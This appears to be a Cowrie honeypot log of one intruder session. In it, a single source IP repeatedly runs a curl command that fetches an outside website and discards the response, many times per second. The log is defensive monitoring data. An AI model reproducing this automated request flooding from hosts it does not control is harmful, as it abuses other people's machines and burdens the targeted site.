{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.488350Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.489355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.536078Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.536975Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.573727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.574651Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.611324Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.612283Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.648892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.649782Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.688593Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.689554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.853278Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.854309Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.890746Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.891996Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.928542Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.929524Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.966300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.967476Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.006220Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.008291Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.057306Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.058446Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.095407Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.096408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.133148Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.134483Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.172550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.173797Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.213742Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.214800Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.253600Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.254793Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.291765Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.292764Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.331257Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.332338Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.369226Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.370329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.408496Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.409619Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.456489Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.457894Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.495587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.496799Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.533734Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.534717Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.571839Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.573237Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.610755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.611849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.650163Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.651291Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.692681Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.694068Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.730914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.732034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.772506Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.773672Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.812052Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.813508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.860604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.861710Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.898607Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.899806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.937651Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.939111Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:51.976043Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:51.977278Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.022853Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.024128Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.064201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.065300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.105043Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.106068Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.144252Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.145615Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.182757Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.183925Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.221079Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.222308Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.272918Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.274408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.311816Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.312854Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.351925Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.353148Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.393340Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.394342Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.430970Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.431964Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.468384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.469418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.506071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.507046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.543841Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.544865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.581335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.582353Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.620105Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.621018Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.667937Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.668962Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.706011Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.707071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.744160Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.745051Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.781361Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.782303Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.818766Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.819821Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.856610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.857551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.893943Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.894963Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.931548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.932850Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:52.970213Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:52.971266Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.008230Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.009236Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.064320Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.065594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.103037Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.104011Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.141240Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.142202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.178696Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.180021Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.216804Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
